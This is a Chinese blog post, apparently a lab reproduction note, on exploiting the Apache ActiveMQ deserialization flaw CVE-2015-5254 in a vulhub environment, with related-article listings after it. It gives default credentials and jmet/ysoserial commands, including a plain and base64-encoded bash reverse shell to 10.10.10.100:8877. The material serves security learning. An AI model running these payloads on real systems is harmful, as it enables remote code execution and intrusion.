ActiveMQ 反序列化漏洞(CVE-2015-5254)

已于 2022-10-17 10:11:03 修改
阅读量234 收藏
点赞数
分类专栏: 漏洞复现笔记 文章标签: activemq
于 2022-10-17 10:08:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45957998/article/details/127357628
版权

ActiveMQ 反序列化漏洞(CVE-2015-5254)

https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.md

影响范围:Apache ActiveMQ 5.13.0之前5.x版本

默认密码:admin/admin

其中61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。访问http://your-ip:8161即可看到web管理页面,不过这个漏洞理论上是不需要web的

漏洞利用过程如下:

  1. 构造(可以使用ysoserial)可执行命令的序列化对象
  2. 作为一个消息,发送给目标61616端口
  3. 访问web管理页面,读取消息,触发漏洞

使用jmet进行漏洞利用。首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。

jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

执行:

poc
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.225.134 61616

此时会给目标ActiveMQ添加一个名为event的队列,我们可以通过http://your-ip:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息:点击即可触发

payload
bash -i >& /dev/tcp/10.10.10.100/8877 0>&1
上面这行base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMDAvODg3NyAwPiYx
getshell-exp
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMDAvODg3NyAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.225.134 61616
注意:反弹shell里不能有引号
小白奋斗ing(小破站)
关注
专栏目录
漏洞复现】ActiveMQ反序列化漏洞(CVE-2015-5254)
晚风不及你
01-05 634
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
CVE-2015-5254(ActiveMQ反序列化漏洞复现)
Sea_Sand息禅
07-13 2922
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者...
ActiveMQ CVE-2015-5254 分析
示例和笔记
06-07 330
ActiveMQ CVE-2015-5254漏洞是由于缺少对序列化数据的校验而导致,攻击者可以在序列化的数据中注入恶意代码。当 ActiveMQ 接收到该序列化数据并尝试反序列化时,将会执行这段恶意代码,从而实现攻击目的。具体来说,该漏洞的发生是由于 ActiveMQ 的两个缺陷导致。首先是方法中的缺陷,该方法将异常对象序列化为字节数组,这个字节数组包含了cause内的异常和message内的信息。攻击者可以构造精心设计的cause和message来注入恶意代码。接着,ActiveMQ 的与。
ActiveMQ反序列化漏洞CVE-2015-5254复现
weixin_51387754的博客
06-19 447
ActiveMQ反序列化漏洞CVE-2015-5254)复现漏洞前言0x01 漏洞环境 漏洞前言 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 0x0
ActiveMQ反序列化漏洞 getshell(CVE-2015-5254)——漏洞复现
W小哥
11-10 3756
一、ActiveMQ介绍 1.1 简介 Apache的一款JAVA开源消息中间件,支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。 (消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等) 1.2 漏洞影响版本 Apache ActiveMQ < 5.13.0 之前 5.x版本 1.3 漏洞成因 漏洞没有限制在代理中序列化的类,远程攻击者可以借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 1.
提取流量包中的文件_复现:Apache ActiveMQ反序列化漏洞(CVE20155254)和任意文件写入漏洞CVE20163088)...
weixin_28736145的博客
12-29 251
Apache ActiveMQ是Apache软件基金会的一个开源项目,是一个基于消息的通信中间件。ActiveMQ是JMS的一个具体实现,JMS(Java Message Service)是一个基于消息的中间件服务,它是java的一个接口规范,而不是一个具体的软件或者库。它支持两种消息传送模型,点对点模型(Point to Point Model)和发布/订阅模型(Publisher/S...
漏洞复现】---- ActiveMQ 反序列化漏洞CVE-2015-5254
qq_43168364的博客
09-04 709
一、简介 Apache ActiveMQ是老外所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。攻击者可以借助特制的序列化的java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 漏洞影响的版本为:Apache ActiveMQ 5.13.0之前的版本。 二、漏洞环境准备 pull下来内容 环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个反序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...
ActiveMQ 反序列化漏洞 (CVE-2015-5254)
qq_32642035的博客
10-17 1251
ActiveMQ 反序列化漏洞 (CVE-2015-5254)漏洞复现
ActiveMQ CVE-2016-3088
菜鸟的学习笔记
06-28 224
1. 环境搭建 使用vulhub的配置执行命令:docker-compose up -d 一键启动漏洞环境 环境监听61616端口和8161端口,其中8161是web控制台端口。此漏洞出现在 Web 控制台中。 访问http://your-ip:8161/查看网页,说明环境已经运行成功。默认的 ActiveMQ 帐户和密码是admin。 2. 漏洞复现 首先我们先访问http://your-ip:8161/admin/test/systemProperties.jsp,来查看绝对路径。 之后需要使用B
java-1.0.1.jar
10-15
java-1.0.1.jar 压缩 包里面有对应的jar 架包,解压出来就可以
jsch-0.1.50.jar(Jmeter 操作 Linux 所必须的两Jar包之一)
03-22
jsch-0.1.50.jar(Jmeter 操作 Linux 所必须的两Jar包之一)
ActiveMQ 反序列化漏洞复现(CVE-2015-5254)
oiadkt的博客
04-14 539
ActiveMQ 反序列化漏洞复现(CVE-2015-5254)
ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现
qq_45314073的博客
09-16 1503
ActiveMQ 反序列化漏洞
activemq系列漏洞复现
m0_49420271的博客
06-07 2908
vulhub中activemq系列漏洞复现
ActiveMQ 反序列化漏洞CVE-2015-5254漏洞复现
chenming08的博客
04-26 573
5、下载jmet-0.1.0-all.jar(时间较长):https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar(攻击机)6、执行java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “touch /tmp/sucess” -Yp ROME 你的IP 61616(攻击机)实验环境:攻击机----kali。3、启动环境(靶机)
【vulhub漏洞复现】CVE-2015-5254 ActiveMQ反序列化漏洞
RexHa的博客
02-26 1991
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
CVE-2015-5254
forinput的博客
03-01 96
CVE-2015-5254
ActiveMQ 反序列化漏洞
最新发布
08-19
ActiveMQ 反序列化漏洞是指在使用 ActiveMQ 进行消息传递时,由于未正确验证和过滤用户提交的数据,恶意攻击者可以利用该漏洞在目标系统上执行任意代码。这种漏洞通常是由于未正确配置 ActiveMQ 的序列化和反序列化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小白奋斗ing(小破站)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值